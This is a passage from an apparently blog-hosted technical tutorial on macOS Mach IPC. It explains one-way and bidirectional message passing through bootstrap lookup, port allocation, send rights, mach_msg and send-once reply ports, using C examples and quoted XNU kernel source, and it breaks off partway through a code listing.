<span class="title">sender</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="comment">// look up the service in bootstrap and obtain a mach port</span></span><br><span class="line">    <span class="type">mach_port_t</span> port;</span><br><span class="line">    <span class="type">kern_return_t</span> kr = <span class="built_in">bootstrap_look_up</span>(bootstrap_port, <span class="string">&quot;io.github.kiprey&quot;</span>, &amp;port);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;bootstrap_look_up() returned port right name %d\n&quot;</span>, port);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// build the message to send</span></span><br><span class="line">    <span class="keyword">struct</span> &#123;</span><br><span class="line">        <span class="type">mach_msg_header_t</span> header;</span><br><span class="line">        <span class="type">char</span> texts[<span class="number">20</span>];</span><br><span class="line">        <span class="type">int</span> integer;</span><br><span class="line">    &#125; message = &#123;<span class="number">0</span>&#125;;  <span class="comment">// zero-initialize so msgh_voucher_port and msgh_id are not left uninitialized</span></span><br><span class="line"></span><br><span class="line">    message.header.msgh_bits = <span class="built_in">MACH_MSGH_BITS</span>(MACH_MSG_TYPE_COPY_SEND, <span class="number">0</span>);</span><br><span class="line">    message.header.msgh_remote_port = port;</span><br><span class="line">    message.header.msgh_local_port = MACH_PORT_NULL;</span><br><span class="line">    message.header.msgh_size = <span class="built_in">sizeof</span>(message);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">strcpy</span>(message.texts, <span class="string">&quot;kiprey_texts&quot;</span>);</span><br><span class="line">    message.integer = <span class="number">123</span>;</span><br><span class="line"></span><br><span class="line">    <span 
class="comment">// send it</span></span><br><span class="line">    <span class="type">mach_msg_return_t</span> mr = <span class="built_in">mach_msg_send</span>(&amp;message.header);</span><br><span class="line">    <span class="built_in">assert</span>(mr == MACH_MSG_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;message is sent.\n&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">receiver</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="comment">// create a mach port with a receive right</span></span><br><span class="line">    <span class="type">mach_port_t</span> port;</span><br><span class="line">    <span class="type">kern_return_t</span> kr = <span class="built_in">mach_port_allocate</span>(<span class="built_in">mach_task_self</span>(), MACH_PORT_RIGHT_RECEIVE, &amp;port);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;mach_port_allocate() created port right name %d\n&quot;</span>, port);</span><br><span class="line">    </span><br><span class="line">    <span class="comment">// add a send right to this port as well</span></span><br><span class="line">    kr = <span class="built_in">mach_port_insert_right</span>(<span class="built_in">mach_task_self</span>(), port, port, MACH_MSG_TYPE_MAKE_SEND);</span><br><span class="line">    <span class="built_in">assert</span> (kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;mach_port_insert_right() inserted a send right\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// hand the port&#x27;s send right to bootstrap so that other processes can look it up</span></span><br><span class="line">    kr = <span 
class="built_in">bootstrap_register</span>(bootstrap_port, <span class="string">&quot;io.github.kiprey&quot;</span>, port);</span><br><span class="line">    <span class="built_in">assert</span> (kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;bootstrap_register()&#x27;ed our port\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// wait for a message</span></span><br><span class="line">    <span class="keyword">struct</span> &#123;</span><br><span class="line">        <span class="type">mach_msg_header_t</span> header;</span><br><span class="line">        <span class="type">char</span> texts[<span class="number">20</span>];</span><br><span class="line">        <span class="type">int</span> integer;</span><br><span class="line">        <span class="type">mach_msg_trailer_t</span> trailer;</span><br><span class="line">    &#125; message;</span><br><span class="line"></span><br><span class="line">    message.header.msgh_size = <span class="built_in">sizeof</span>(message);</span><br><span class="line">    message.header.msgh_local_port = port;</span><br><span class="line">    kr = <span class="built_in">mach_msg_receive</span>(&amp;message.header);</span><br><span class="line">    <span class="built_in">assert</span> (kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Got a message\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Text: %s, number: %d\n&quot;</span>, message.texts, message.integer);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> * 
argv[])</span> </span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(fork() == <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="comment">// wait until the receiver has registered its port before sending</span></span><br><span class="line">        <span class="built_in">sleep</span>(<span class="number">1</span>);</span><br><span class="line">        <span class="built_in">sender</span>();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="built_in">receiver</span>();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Test result:</p><p><img src="/2021/12/mach_ipc_intro/image-20211225192910087.png" alt="image-20211225192910087"></p><p>The next sections briefly go through some of the user-space APIs called in this example.</p><h4 id="a-mach-port-allocate">a. 
mach_port_allocate</h4><p>Initially, the receiver calls <code>mach_port_allocate</code> to create a Mach port with the specified right:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">mach_port_t</span> port;</span><br><span class="line"><span class="type">kern_return_t</span> kr = <span class="built_in">mach_port_allocate</span>(<span class="built_in">mach_task_self</span>(), MACH_PORT_RIGHT_RECEIVE, &amp;port);</span><br></pre></td></tr></table></figure><p>The function is declared as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">mach_port_allocate</span><span class="params">(<span class="type">ipc_space_t</span> task,  <span class="type">mach_port_right_t</span> right, <span class="type">mach_port_name_t</span> *name)</span></span></span><br></pre></td></tr></table></figure><p>The first argument specifies the task of the current process. Interestingly, this <strong>task is itself specified</strong> by passing a Mach port name. Below is the source code of task_self_trap; mach_task_self is a wrapper around it.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span 
class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> *  Routine:    task_self_trap [mach trap]</span></span><br><span class="line"><span class="comment"> *  Purpose:</span></span><br><span class="line"><span class="comment"> *      Give the caller send rights for his own task port.</span></span><br><span class="line"><span class="comment"> *  Conditions:</span></span><br><span class="line"><span class="comment"> *      Nothing locked.</span></span><br><span class="line"><span class="comment"> *  Returns:</span></span><br><span class="line"><span class="comment"> *      MACH_PORT_NULL if there are any resource failures</span></span><br><span class="line"><span class="comment"> *      or other errors.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">mach_port_name_t</span></span></span><br><span class="line"><span class="function"><span class="title">task_self_trap</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    __unused <span class="keyword">struct</span> task_self_trap_args *args)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">task_t</span> task = <span class="built_in">current_task</span>();</span><br><span class="line">    <span class="type">ipc_port_t</span> sright;</span><br><span class="line">    <span class="type">mach_port_name_t</span> name;</span><br><span class="line"></span><br><span class="line">    sright = <span class="built_in">retrieve_task_self_fast</span>(task);</span><br><span class="line">    name = <span class="built_in">ipc_port_copyout_send</span>(sright, task-&gt;itk_space);</span><br><span class="line">    <span class="keyword">return</span> 
name;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The second argument specifies the right of the Mach port to allocate; here a <strong>receive right</strong> is requested. According to the xnu source, only the following three values are valid for this argument:</p><ul><li><code>MACH_PORT_RIGHT_RECEIVE</code>: create a new port that initially has only a receive right</li><li><code>MACH_PORT_RIGHT_PORT_SET</code>: create an empty port set with no members</li><li><code>MACH_PORT_RIGHT_DEAD_NAME</code>: create a new dead name</li></ul><p>The third argument specifies <strong>where the name of the newly allocated port is stored on success</strong>; it needs no further explanation.</p><h4 id="b-mach-port-insert-right">b. mach_port_insert_right</h4><p>Purpose: insert the specified port right into the given task (the current task in this example).</p><p>How the example uses it:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// add a send right to this port as well</span></span><br><span class="line">kr = <span class="built_in">mach_port_insert_right</span>(<span class="built_in">mach_task_self</span>(), port, port, MACH_MSG_TYPE_MAKE_SEND);</span><br></pre></td></tr></table></figure><p>Its declaration is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">kern_return_t</span></span></span><br><span class="line"><span class="function"><span class="title">mach_port_insert_right</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="type">ipc_space_t</span> task,</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="type">mach_port_name_t</span> name,</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="type">mach_port_t</span> poly,</span></span></span><br><span class="line"><span 
class="params"><span class="function">    <span class="type">mach_msg_type_name_t</span> polyPoly)</span></span></span><br></pre></td></tr></table></figure><p>In this example, the caller adds a send right to the newly created port (which at that point has only a receive right). The send right here means <strong>the right to send Mach messages to this port</strong>.</p><h4 id="c-bootstrap-register-lookup">c. bootstrap_register/lookup</h4><p>On OS X, when a new task is created it is additionally given a set of special Mach ports, including:</p><ul><li>The host port (itk_host), which represents the machine the task runs on. This port lets the task obtain information about the kernel and the host.</li><li>The task port (itk_sself), that is, a port that refers to the task itself. This port does not appear to be usable for controlling the task itself; it seems it can only be used to obtain task info.</li><li>The bootstrap port (itk_bootstrap), which connects to the bootstrap server (launchd).</li></ul><blockquote><p>The remaining ones are listed in <code>osfmk/mach/task_special_ports.h</code>.</p></blockquote><p>The corresponding fields in the kernel task structure are as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* IPC structures */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">ipc_port</span> *itk_self;  <span class="comment">/* not a right, doesn&#x27;t hold ref */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title 
class_">ipc_port</span> *itk_nself; <span class="comment">/* not a right, doesn&#x27;t hold ref */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">ipc_port</span> *itk_sself; <span class="comment">/* a send right */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">exception_action</span> exc_actions[EXC_TYPES_COUNT];</span><br><span class="line"><span class="comment">/* a send right each valid element  */</span></span><br><span class="line"><span class="comment">// host port</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">ipc_port</span> *itk_host;  <span class="comment">/* a send right */</span> </span><br><span class="line"><span class="comment">// bootstrap port</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">ipc_port</span> *itk_bootstrap; <span class="comment">/* a send right */</span></span><br><span class="line"><span class="comment">// seatbelt port</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">ipc_port</span> *itk_seatbelt;  <span class="comment">/* a send right */</span></span><br><span class="line"><span class="comment">// gssd port</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">ipc_port</span> *itk_gssd;  <span class="comment">/* yet another send right */</span></span><br><span class="line"><span class="comment">// debug port</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">ipc_port</span> *itk_debug_control; <span class="comment">/* send right for debugmode communications */</span></span><br><span class="line"><span class="comment">// task_access port</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">ipc_port</span> *itk_task_access; <span 
class="comment">/* and another send right */</span> </span><br><span class="line"><span class="comment">// resume port</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">ipc_port</span> *itk_resume;    <span class="comment">/* a receive right to resume this task */</span></span><br><span class="line"><span class="comment">// registered ports; register them by calling mach_ports_register</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">ipc_port</span> *itk_registered[TASK_PORT_REGISTER_MAX];</span><br><span class="line"><span class="comment">/* all send rights */</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">ipc_space</span> *itk_space;</span><br></pre></td></tr></table></figure><p>As shown, these <code>struct ipc_port itk_*</code> fields are all special Mach ports that are set up for every task.</p><blockquote><p>Among them, <code>itk_host</code>, <code>itk_bootstrap</code>, <code>itk_seatbelt</code>, <code>itk_gssd</code>, and <code>itk_task_access</code> are inherited from the parent task.</p></blockquote><p>As for the <code>itk_registered</code> array, a user can register a port into it with <strong>mach_ports_register</strong> and query it with <strong>mach_ports_lookup</strong>. A registered port right fills one slot of the itk_registered array in the task structure.</p><p>The bootstrap server provides a port namespace in which a task can register its own ports, and other tasks can look them up and send messages to them.</p><p>The bootstrap server can be thought of as a phone book: a task publishes a <strong>well-known, named</strong> entry that corresponds to the Mach port the task is listening on.</p><p>If a task needs to register a service with the bootstrap server, it can use the <code>bootstrap_register()</code> function, which takes a string name and the Mach port associated with it. Note, however, that Mac OS X deprecated this function in 10.5, so the compiler emits a deprecation warning when building the example above.</p><blockquote><p>That said, bootstrap_check_in can be used in place of bootstrap_register.</p></blockquote><p>In this example, the receiver registers <strong>a Mach port with a send right</strong> in bootstrap. When the <strong>sender</strong> then asks bootstrap for the <strong>receiver</strong>'s port, bootstrap can hand a copy of <strong>the send right of the registered Mach port</strong> to the <strong>sender</strong>.</p><p>The <strong>sender</strong> now holds a send right to that Mach port and can send data to it, while the other end of the port (the <strong>receiver</strong>) can directly read the messages the sender sends.</p><h4 id="d-mach-msg">d. mach_msg</h4><p>Purpose: send or receive a Mach message. In this example, both the sender and the receiver indirectly call this function to send or receive a Mach message.</p><p>Let us first take a quick look at the definition of mach_msg to understand what each argument does; how the kernel handles the call is covered later.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">mach_msg_return_t</span></span></span><br><span class="line"><span class="function"><span class="title">mach_msg</span><span class="params">(msg, option, send_size, rcv_size, rcv_name, timeout, notify)</span></span></span><br><span class="line"><span class="function">    <span class="type">mach_msg_header_t</span> *msg</span>;    <span class="comment">// pointer to the Mach message</span></span><br><span class="line">    <span class="type">mach_msg_option_t</span> option;  <span class="comment">// basic flags, e.g. MACH_SEND_MSG or MACH_RCV_MSG to select sending or receiving</span></span><br><span class="line">    <span class="type">mach_msg_size_t</span> send_size; <span class="comment">// length of the message to send</span></span><br><span 
class="line">    <span class="type">mach_msg_size_t</span> rcv_size;  <span class="comment">// length of the message to receive</span></span><br><span class="line">    <span class="type">mach_port_t</span> rcv_name;      <span class="comment">// port to receive the message on</span></span><br><span class="line">    <span class="type">mach_msg_timeout_t</span> timeout;<span class="comment">// maximum time mach_msg may wait</span></span><br><span class="line">    <span class="type">mach_port_t</span> notify;        <span class="comment">// a notification port, used to receive notifications</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">mach_msg_return_t</span></span></span><br><span class="line"><span class="function"><span class="title">mach_msg_send</span><span class="params">(<span class="type">mach_msg_header_t</span> *msg)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">mach_msg</span>(msg, MACH_SEND_MSG,</span><br><span class="line">            msg-&gt;msgh_size, <span class="number">0</span>, MACH_PORT_NULL,</span><br><span class="line">            MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">mach_msg_return_t</span></span></span><br><span class="line"><span class="function"><span class="title">mach_msg_receive</span><span class="params">(<span class="type">mach_msg_header_t</span> *msg)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">mach_msg</span>(msg, MACH_RCV_MSG,</span><br><span class="line">            <span class="number">0</span>, msg-&gt;msgh_size, msg-&gt;msgh_local_port,</span><br><span class="line">            MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);</span><br><span 
class="line">&#125;</span><br></pre></td></tr></table></figure><p>The sender needs to fill in a few header fields:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">message.header.msgh_bits = <span class="built_in">MACH_MSGH_BITS</span>(MACH_MSG_TYPE_COPY_SEND, <span class="number">0</span>); <span class="comment">// right types (remote, local) for the ports set below</span></span><br><span class="line">message.header.msgh_remote_port = port;          <span class="comment">// destination port of the message</span></span><br><span class="line">message.header.msgh_local_port = MACH_PORT_NULL; <span class="comment">// no reply port</span></span><br><span class="line">message.header.msgh_size = <span class="built_in">sizeof</span>(message);</span><br></pre></td></tr></table></figure><h3 id="2-双向-mach-通信示例">2. Bidirectional mach communication example</h3><p>The example above showed the basics of one-way mach communication (<strong>sender-&gt; receiver</strong>). Next we let the <strong>receiver</strong> send data back to the <strong>sender</strong> as well, giving us bidirectional communication.</p><p>Note that a mach port is a one-way channel, so the <strong>sender has to create a new port</strong> (the sender owns this new mach port, while the receiver already owns the old one) and <strong>give the receiver a send right to that port</strong> before traffic can flow in both directions. This raises a question: <strong>how do we transfer a mach port right?</strong></p><p>One option is to go through bootstrap again. That works, but it is not very elegant. Since the sender can already reach the receiver through the existing mach port, we can <strong>use that mach port to send the receiver a send right to the new mach port</strong>.</p><p><strong>This works because a Mach message can carry port rights.</strong></p><p>The whole exchange looks like this, where bob is the sender and alice is the receiver:</p><p><img src="/2021/12/mach_ipc_intro/mach-messages-bidirectional.png" alt="img"></p><p>The remaining question is how to send the right across. We look at two different ways in turn.</p><h4 id="a-reply-port">a. 
reply port</h4><h5 id="1-sender">1) sender</h5><p>Once the sender has obtained a send right to the receiver's mach port from bootstrap, it can send messages to the receiver. This is how the message header was set up before:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">message.header.msgh_bits = <span class="built_in">MACH_MSGH_BITS</span>(<span class="comment">/* remote */</span> MACH_MSG_TYPE_COPY_SEND, <span class="comment">/* local */</span><span class="number">0</span>);</span><br><span class="line">message.header.msgh_remote_port = port;</span><br><span class="line">message.header.msgh_local_port = MACH_PORT_NULL;</span><br></pre></td></tr></table></figure><p>Here, however, we set up the message differently:</p><ol><li>In msgh_bits, additionally set the right type for the local port to MACH_MSG_TYPE_MAKE_SEND_ONCE, so that <strong>the peer can send to that port only once</strong>.</li><li>Put the newly created local replyPort into the msgh_local_port field.</li></ol><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">message.header.msgh_bits = <span class="built_in">MACH_MSGH_BITS_SET</span>(</span><br><span class="line">    <span class="comment">/* remote */</span> MACH_MSG_TYPE_COPY_SEND,</span><br><span class="line">    <span class="comment">/* local */</span> MACH_MSG_TYPE_MAKE_SEND_ONCE,</span><br><span class="line">    <span class="comment">/* voucher */</span> <span class="number">0</span>,</span><br><span class="line">    <span class="comment">/* other */</span> <span class="number">0</span>);</span><br><span 
class="line"><span class="comment">// Note: the statement above is equivalent to </span></span><br><span class="line"><span class="comment">// message.header.msgh_bits = MACH_MSGH_BITS(/* remote */ MACH_MSG_TYPE_COPY_SEND, /* local */ MACH_MSG_TYPE_MAKE_SEND_ONCE);</span></span><br><span class="line"></span><br><span class="line">message.header.msgh_remote_port = port;</span><br><span class="line"></span><br><span class="line"><span class="comment">// Unlike the one-way case, which used MACH_PORT_NULL, this is a mach port the sender created itself and that has a send right</span></span><br><span class="line">message.header.msgh_local_port = replyPort; </span><br></pre></td></tr></table></figure><p>When this message is sent with mach_msg, it carries a send-once right to replyPort along with it.</p><blockquote><p>What is this replyPort for? The receiver on the other side uses it to send messages back to the sender.</p></blockquote><p>Note the <code>message.header.msgh_bits</code> we set: its <code>local</code> part is <strong>MACH_MSG_TYPE_MAKE_SEND_ONCE</strong>, which means the receiver can perform only one send on replyPort.</p><h5 id="2-receiver">2) receiver</h5><p>When the receiver gets the message, the <code>remote_port</code> and <code>local_port</code> the sender filled in are swapped: they show up as the <code>local_port</code> and <code>remote_port</code> of the received message, respectively.</p><p>So on the receiver's side, <code>remote_port</code> in the message is not MACH_PORT_NULL but <strong>the <code>replyPort</code> set earlier</strong>.</p><p>The receiver can then send to the sender through this replyPort. Note that when it does, the remote part of message.header.msgh_bits must name the right the receiver actually holds, a send-once right, i.e. <code>MACH_MSG_TYPE_MOVE_SEND_ONCE</code> (the same value as MACH_MSG_TYPE_PORT_SEND_ONCE) rather than MACH_MSG_TYPE_MAKE_SEND_ONCE, which would require the receive right. The simplest way is to reuse the remote bits of the received header.</p><p>Because of the restriction chosen by the side that sent replyPort (the sender), the receiver can send only one message to replyPort.</p><h5 id="3-代码示例">3) Code example</h5><p>The complete implementation:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span 
class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span 
class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mach/mach.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;servers/bootstrap.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span 
class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;assert.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">mach_msg_send_t</span> &#123;</span><br><span class="line">    <span class="type">mach_msg_header_t</span> header;</span><br><span class="line">    <span class="type">char</span> texts[<span class="number">0x20</span>];</span><br><span class="line">    <span class="type">int</span> integer;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">mach_msg_receive_t</span> &#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">mach_msg_send_t</span> recv_content;</span><br><span class="line">    <span class="type">mach_msg_trailer_t</span> trailer;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">sender</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// look up the receiver's mach port through bootstrap</span></span><br><span class="line">    <span class="type">mach_port_t</span> port;</span><br><span class="line">    <span class="type">kern_return_t</span> kr = <span class="built_in">bootstrap_look_up</span>(bootstrap_port, <span class="string">&quot;io.github.kiprey&quot;</span>, &amp;port);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[sender] bootstrap_look_up() returned port right name %d\n&quot;</span>, 
port);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// build the message to send</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">mach_msg_send_t</span> send_msg;</span><br><span class="line">    <span class="built_in">strcpy</span>(send_msg.texts, <span class="string">&quot;Hello, I&#x27;m sender.&quot;</span>);</span><br><span class="line">    send_msg.integer = <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// create a replyPort for the receiver to reply on</span></span><br><span class="line">    <span class="type">mach_port_t</span> replyPort;</span><br><span class="line">    kr = <span class="built_in">mach_port_allocate</span>(<span class="built_in">mach_task_self</span>(), MACH_PORT_RIGHT_RECEIVE, &amp;replyPort);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[sender] mach_port_allocate() created port right name %d\n&quot;</span>, replyPort);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// add a send right to that port as well</span></span><br><span class="line">    kr = <span class="built_in">mach_port_insert_right</span>(<span class="built_in">mach_task_self</span>(), replyPort, replyPort, MACH_MSG_TYPE_MAKE_SEND);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[sender] mach_port_insert_right() inserted a send right\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// note: the right type for the local (reply) port is MACH_MSG_TYPE_MAKE_SEND_ONCE</span></span><br><span class="line">    send_msg.header.msgh_bits           = <span class="built_in">MACH_MSGH_BITS</span>(MACH_MSG_TYPE_COPY_SEND, 
